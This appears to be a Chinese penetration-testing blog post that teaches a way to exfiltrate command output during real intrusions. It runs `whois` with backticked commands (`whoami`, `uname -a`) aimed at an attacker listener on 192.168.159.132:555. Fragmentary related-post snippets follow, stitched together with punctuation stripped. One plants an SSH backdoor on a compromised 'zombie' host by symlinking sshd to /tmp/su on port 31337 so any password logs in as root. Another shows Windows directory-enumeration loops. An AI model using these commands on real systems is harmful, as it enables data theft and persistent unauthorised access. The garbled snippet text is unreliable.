在實戰過程中,可能會遇到一些複雜的網路情況,導致需要執行的命令沒辦法看到返回結果,這就給後續滲透帶來很大的不便,從twitter中看到一種新型的命令執行結果外帶的方法,在這裡分享記錄一下
先看一下whois
命令的使用介紹
[email protected]:~# whois -h
whois: 選項需要乙個引數 -- h
用法: whois 【選項】 …… 物件 ……
-h host, --host host 連線到伺服器 host
-p port, --port port 連線到埠 port
-h 隱藏法律宣告
--verbose 解釋正在做什麼
--help 顯示幫助並退出
--version 輸出版本資訊並退出
這些標誌是由 whois.ript.net 和 ripe-like 伺服器支援的:
-l 尋找有更少具體匹配的乙個級別
-l 尋找所有更少具體匹配的級別
-m 尋找有更加具體匹配的乙個級別
-m 尋找有更加具體的匹配的所有級別
-c 尋找包含 mnt-irt 屬性的最小匹配
-x 精確匹配
-b return brief ip address ranges with abuse contact
-b 關閉物件過濾(顯示 email 位址)
-g 關閉相關聯物件的分組
-d 返回 dns 反解授權物件
-i attr[,attr]... 對特定的屬性( attr )進行逆向查詢
-t type[,type]... 只尋找 type 的物件
-k 只返回主鍵
-r 關閉聯絡資訊的遞迴查詢
-r 強制顯示域物件的本地副本,即使
它包含引用
-a 一併搜尋所有的資料庫映象
-s source[,source]... 從 source 中搜尋資料庫映象
-g source:first-last 從序列的 first 到 last 的 source 中查詢更新
-t type 請求 type 物件的模板
-v type 請求 type 物件的詳細模板
-q [version|sources|types] 詢問制定伺服器資訊
[email protected]:~#
仔細點就可以發現whois
命令有兩個引數可以連線到遠端伺服器-h
和-p
那麼我們來嘗試下利用whois
命令外帶回顯命令執行結果
先在kali中監聽乙個埠用來接收回顯結果
在ubuntu中執行命令
whois -h 192.168.159.132 -p 555 "`whoami&uname -a`"
需要注意:這裡使用的是反引號,這樣才會在linux的bash環境執行命令,後面的雙引號可帶可不帶
執行後就看到命令的回顯結果已經帶出到kali中了
滲透技巧之ssh
肉雞上執行 mickey vic ln sf usr sbin sshd tmp su tmp su oport 31337 就會派生乙個31337埠,然後連線31337,用root bin ftp mail當使用者名稱,密碼隨意,就可登陸。效果圖 在肉雞上執行 root localhost cd ...
滲透技巧之SSH篇
mickey 2014 05 12 13 57 用些小技巧,濛濛菜鳥管理員。肉雞上執行 bash email protected ln sf usr sbin sshd tmp su tmp su oport 31337 複製 就會派生乙個31337埠,然後連線31337,用root bin ftp...
滲透測試技巧更新5
1.for d i in d freehost do echo i 列出d的所有目錄 for d i in do echo i 把當前路徑下資料夾的名字只有1 3個字母的打出來 2.for r i in exe do echo i 以當前目錄為搜尋路徑.會把目錄與下面的子目錄的全部exe檔案列出 f...